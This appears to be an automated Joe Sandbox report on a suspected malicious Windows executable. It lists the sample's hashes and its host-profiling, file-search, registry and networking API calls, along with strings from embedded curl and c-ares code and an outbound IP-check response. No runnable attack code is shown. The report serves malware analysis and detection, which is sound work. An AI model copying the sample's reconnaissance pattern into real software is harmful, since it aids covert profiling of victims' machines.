Date: Sat, 28 Dec 2024 08:35:29 GMT
Content-Type: application/json
Content-Length: 31
Connection: close
Server: gunicorn/19.9.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
2024-12-28 08:35:29 UTC  31                 IN         Data Ascii: { "origin": "8.46.123.189"}



Target ID: 0
Start time: 03:35:24
Start date: 28/12/2024
Path: C:\Users\user\Desktop\s8kPMNXOZY.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\s8kPMNXOZY.exe"
Imagebase: 0x240000
File size: 4'500'992 bytes
MD5 hash: FBBA61C61FA706EEC44A022A1E9E3BAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 2.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 20.8%
Total number of Nodes: 313
Total number of Limit Nodes: 50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                          • API String ID: 0-1590685507
                                                          • Opcode ID: 581bffb8864e1519223e02d9b35279857bed505f39eba62aebd74d6d99268b35
                                                          • Instruction ID: dd1eb58de45173502894a9e172dae87c496a8b46f30acc801bab300be9eec30b
                                                          • Opcode Fuzzy Hash: 581bffb8864e1519223e02d9b35279857bed505f39eba62aebd74d6d99268b35
                                                          • Instruction Fuzzy Hash: F3C2C031A183459FD764DF28C584B6AB7E1BF84314F05C66DEC9C8B2A2D770E9A4CB81

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSystemInfo.KERNELBASE ref: 00242579
                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 002425CC
                                                          • GetDriveTypeA.KERNELBASE ref: 00242647
                                                          • GetDiskFreeSpaceExA.KERNELBASE ref: 0024267E
                                                          • KiUserCallbackDispatcher.NTDLL ref: 002427E2
                                                          • SHGetKnownFolderPath.SHELL32 ref: 0024286D
                                                          • FindFirstFileW.KERNELBASE ref: 002428F8
                                                          • FindNextFileW.KERNELBASE ref: 0024291F
                                                          Similarity
                                                          • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                                          • String ID: ;%$$@$`
                                                          • API String ID: 2066228396-2302490886
                                                          • Opcode ID: 07b446268f85d2f9ded73d6ea5b1909f4dbc9119097e5efddea9a82f5a365715
                                                          • Instruction ID: 9fb56d4148005850171cfad1033df88bf3c4cdce7ec1da0f9b93f57e04bca4cc
                                                          • Opcode Fuzzy Hash: 07b446268f85d2f9ded73d6ea5b1909f4dbc9119097e5efddea9a82f5a365715
                                                          • Instruction Fuzzy Hash: 1FD184B4909319DFCB50EFA8C98569EBBF0FF44344F00896DE89897251E7749A84CF92

                                                          Control-flow Graph

                                                          Similarity
                                                          • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                          • String ID: 0
                                                          • API String ID: 2406880114-4108050209
                                                          • Opcode ID: 2f50169be6c3ab3165ca80e5747a5c356540702fdf8a449c4709c3ada34cd79a
                                                          • Instruction ID: d38ea76ec68e6e690342793f960967ca824106ad77ab397ea48c8ffe40dbd054
                                                          • Opcode Fuzzy Hash: 2f50169be6c3ab3165ca80e5747a5c356540702fdf8a449c4709c3ada34cd79a
                                                          • Instruction Fuzzy Hash: 20E1D4B4918209DFCB50EFA9D9857ADBBF4AF44304F40886DE888D7350E7789958CF42

                                                          Control-flow Graph

                                                          APIs
                                                          • WSAEventSelect.WS2_32(?,?,?), ref: 00250711
                                                          • WSAEventSelect.WS2_32(?,?,00000000), ref: 002509DC
                                                          • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 002509FB
                                                          Similarity
                                                          • API ID: EventSelect$EnumEventsNetwork
                                                          • String ID: N=$$multi.c
                                                          • API String ID: 2170980988-1094639679
                                                          • Opcode ID: f56775723b58ae4eb70549b3c4d87171c71a68442df30f979a887e3de2ac1014
                                                          • Instruction ID: 82c10143263de4778823c845b0975edb38122dcd88e5091e45a520972f4cba3c
                                                          • Opcode Fuzzy Hash: f56775723b58ae4eb70549b3c4d87171c71a68442df30f979a887e3de2ac1014
                                                          • Instruction Fuzzy Hash: 77D1BF716283029FEB10CF64CC85B6BB7E9BF94345F04482CFD9486241E7B4E968CB56

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1697 30b180-30b195 1698 30b3e0-30b3e7 1697->1698 1699 30b19b-30b1a2 1697->1699 1700 30b1b0-30b1b9 1699->1700 1700->1700 1701 30b1bb-30b1bd 1700->1701 1701->1698 1702 30b1c3-30b1d0 1701->1702 1704 30b1d6-30b1f2 1702->1704 1705 30b3db 1702->1705 1706 30b229-30b22d 1704->1706 1705->1698 1707 30b233-30b246 1706->1707 1708 30b3e8-30b417 1706->1708 1709 30b260-30b264 1707->1709 1710 30b248-30b24b 1707->1710 1715 30b582-30b589 1708->1715 1716 30b41d-30b429 1708->1716 1711 30b269-30b286 call 30af30 1709->1711 1712 30b215-30b223 1710->1712 1713 30b24d-30b256 1710->1713 1725 30b2f0-30b301 1711->1725 1726 30b288-30b2a3 call 30b060 1711->1726 1712->1706 1718 30b315-30b33c call 5c8b00 1712->1718 1713->1711 1719 30b435-30b44c call 30b590 1716->1719 1720 30b42b-30b433 call 30b590 1716->1720 1728 30b342-30b347 1718->1728 1729 30b3bf-30b3ca 1718->1729 1736 30b458-30b471 call 30b590 1719->1736 1737 30b44e-30b456 call 30b590 1719->1737 1720->1719 1725->1712 1746 30b307-30b310 1725->1746 1742 30b200-30b213 call 30b020 1726->1742 1743 30b2a9-30b2c7 getsockname call 30b020 1726->1743 1733 30b384-30b38f 1728->1733 1734 30b349-30b358 1728->1734 1738 30b3cc-30b3d9 1729->1738 1733->1729 1741 30b391-30b3a5 1733->1741 1740 30b360-30b382 1734->1740 1755 30b473-30b487 1736->1755 1756 30b48c-30b4a7 1736->1756 1737->1736 1738->1698 1740->1733 1740->1740 1747 30b3b0-30b3bd 1741->1747 1742->1712 1753 30b2cc-30b2dd 1743->1753 1746->1738 1747->1729 1747->1747 1753->1712 1757 30b2e3 1753->1757 1755->1715 1758 30b4b3-30b4cb call 30b660 1756->1758 1759 30b4a9-30b4b1 call 30b660 1756->1759 1757->1746 1764 30b4d9-30b4f5 call 30b660 1758->1764 1765 30b4cd-30b4d5 call 30b660 1758->1765 1759->1758 1770 30b4f7-30b50b 1764->1770 1771 30b50d-30b52b call 30b770 * 2 1764->1771 1765->1764 1770->1715 1771->1715 1776 30b52d-30b531 1771->1776 1777 30b580 1776->1777 1778 30b533-30b53b 1776->1778 1777->1715 1779 30b578-30b57e 1778->1779 1780 30b53d-30b547 1778->1780 1779->1715 1780->1779 1781 30b549-30b54d 1780->1781 1781->1779 1782 30b54f-30b558 1781->1782 1782->1779 1783 30b55a-30b576 call 30b870 * 2 1782->1783 1783->1715 1783->1779
                                                          APIs
                                                          • getsockname.WS2_32(-00000020,-00000020,?), ref: 0030B2B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID: XLm$`Lm$ares__sortaddrinfo.c$cur != NULL
                                                          • API String ID: 3358416759-3601239157
                                                          • Opcode ID: 1d3b353f5564220c2138a91192ed78b1040ea9a9e49b07f6757d0d97531ed4ff
                                                          • Instruction ID: 7b7fbb1e717acbc15ff4b44462e4da61ea0f5e6aefe71105fe914861db7e6078
                                                          • Opcode Fuzzy Hash: 1d3b353f5564220c2138a91192ed78b1040ea9a9e49b07f6757d0d97531ed4ff
                                                          • Instruction Fuzzy Hash: E6C18F716063059FD719DF28C8A0A6AB7E1FF89304F15886CE8499B3E2DB31ED45CB81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 28561495f696fb9bd6b924be0416ccfe228d2e0052ee1189686cacfea790a5bd
                                                          • Instruction ID: 6519a82ea6e7d82cb89988af95840b85598a3ac644472d2b504323a715d621f4
                                                          • Opcode Fuzzy Hash: 28561495f696fb9bd6b924be0416ccfe228d2e0052ee1189686cacfea790a5bd
                                                          • Instruction Fuzzy Hash: 9E9124306AC74A4BD7358E29A8947BB72D5EFC4321F148B2CEC99871D0EB709C68D685
                                                          APIs
                                                          • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,002F712E,?,?,?,00001001,00000000), ref: 0030A90C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: recvfrom
                                                          • String ID:
                                                          • API String ID: 846543921-0
                                                          • Opcode ID: 6021b44333efb118ad0a4e6b17df5e90c846ac296bcdffb823077c98af32dcc6
                                                          • Instruction ID: aeb82fcfb9736b89d41253a63ffdcf09a0156dcab57b58342b58e527ea624ab9
                                                          • Opcode Fuzzy Hash: 6021b44333efb118ad0a4e6b17df5e90c846ac296bcdffb823077c98af32dcc6
                                                          • Instruction Fuzzy Hash: 3EF06D7520930CAFD2209F01EC44D6BBBEDEFC9754F05456DF948232118370AE10DAB2
                                                          APIs
                                                          • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 002FA499
                                                          • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 002FA4FB
                                                          • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 002FA531
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 002FAA19
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 002FAA4C
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 002FAA97
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 002FAAE9
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 002FAB30
                                                          • RegCloseKey.KERNELBASE(?), ref: 002FAB6A
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 002FAB82
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 002FAC46
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 002FAD0A
                                                          • RegEnumKeyExA.KERNELBASE ref: 002FAD8D
                                                          • RegCloseKey.KERNELBASE(?), ref: 002FADD9
                                                          • RegEnumKeyExA.KERNELBASE ref: 002FAE08
                                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 002FAE2A
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 002FAE54
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 002FAF63
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 002FAFB2
                                                          • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 002FB072
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                          • String ID: ;z~$DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$XLm$\Lm$`Lm$cx~
                                                          • API String ID: 4281207131-260609020
                                                          • Opcode ID: ee00fd2f40930d9e5017b4c48d2198e1b7ff91e2c15c676b8392199bef4cf215
                                                          • Instruction ID: 88f929109c8a3b25366618ee832c209699b36c961e23776beb6314fe912e9745
                                                          • Opcode Fuzzy Hash: ee00fd2f40930d9e5017b4c48d2198e1b7ff91e2c15c676b8392199bef4cf215
                                                          • Instruction Fuzzy Hash: F072D1B1618306AFE3109F24CC85B6BB7E8AF85780F144838FA89D7291E775E954CB53
                                                          APIs
                                                          • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0027A832
                                                          Strings
                                                          • Could not set TCP_NODELAY: %s, xrefs: 0027A871
                                                          • cf_socket_open() -> %d, fd=%d, xrefs: 0027A796
                                                          • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0027A6CE
                                                          • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0027AD0A
                                                          • Local Interface %s is ip %s using address family %i, xrefs: 0027AE60
                                                          • @, xrefs: 0027AC42
                                                          • Local port: %hu, xrefs: 0027AF28
                                                          • Trying %s:%d..., xrefs: 0027A7C2, 0027A7DE
                                                          • Name '%s' family %i resolved to '%s' family %i, xrefs: 0027ADAC
                                                          • @, xrefs: 0027A8F4
                                                          • cf-socket.c, xrefs: 0027A5CD, 0027A735
                                                          • Trying [%s]:%d..., xrefs: 0027A689
                                                          • Bind to local port %d failed, trying next, xrefs: 0027AFE5
                                                          • Couldn't bind to '%s' with errno %d: %s, xrefs: 0027AE1F
                                                          • bind failed with errno %d: %s, xrefs: 0027B080
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: setsockopt
                                                          • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                          • API String ID: 3981526788-2373386790
                                                          • Opcode ID: f224fec7991b8f5d5fd91e41613ffa678eb868687bbab43090834133fbd3ac8c
                                                          • Instruction ID: f9bf6bb695c3d60d608427a71d8b1dda2acaaa197ff1e08d83b79228dedcb62d
                                                          • Opcode Fuzzy Hash: f224fec7991b8f5d5fd91e41613ffa678eb868687bbab43090834133fbd3ac8c
                                                          • Instruction Fuzzy Hash: 3562E571518342ABE7218F14C846BAFB7E4BFD1324F04891DF98C97292E771A964CB93

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph: entry 0x309740; basic blocks 851–1177 covering 0x309740–0x30a070. Blocks that call imports: 855 (0x309914–0x30994e) RegOpenKeyExA; 865 (0x30995a–0x309992) RegQueryValueExA, RegCloseKey. All other blocks branch or call internal routines (0x2f4fe0–0x307b70, 0x5c8b50–0x5c8e00); the node/edge list of the rendered graph is omitted.
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00309946
                                                          • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00309974
                                                          • RegCloseKey.KERNELBASE(?), ref: 0030998B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$`Lm$sts
                                                          • API String ID: 3677997916-3832176339
                                                          • Opcode ID: c2faf3dc3dda873c77510b28386c5258949f8567a41ed0fe85e00fbc0c5d1ee2
                                                          • Instruction ID: 93899871f1f6056de12ad8a53b837ecf0698740c8260c4adf4ef9524c8f01f46
                                                          • Opcode Fuzzy Hash: c2faf3dc3dda873c77510b28386c5258949f8567a41ed0fe85e00fbc0c5d1ee2
                                                          • Instruction Fuzzy Hash: 3132F6F59052016BEB12AB24EC52B2BB6D9AF44344F0A4435FD09972A3F731ED24DB93

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph: entry 0x278b50; basic blocks 1259–1348 covering 0x278b50–0x278f06. Blocks that call imports: 1288 (0x278c1f–0x278c30) connect; 1274 (0x278cd9–0x278d16) SleepEx, getsockopt. Other blocks branch or call internal routines (0x2478b0, 0x252a00, 0x253410, 0x256e40, 0x25d090, 0x25d8c0, 0x27a150, 0x27a550, 0x27b100, 0x27b180, 0x284fd0, 0x2850a0); the node/edge list of the rendered graph is omitted.
                                                          APIs
                                                          • connect.WS2_32(?,?,00000001), ref: 00278C30
                                                          • SleepEx.KERNELBASE(00000000,00000000), ref: 00278CF3
                                                          • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00278D0F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
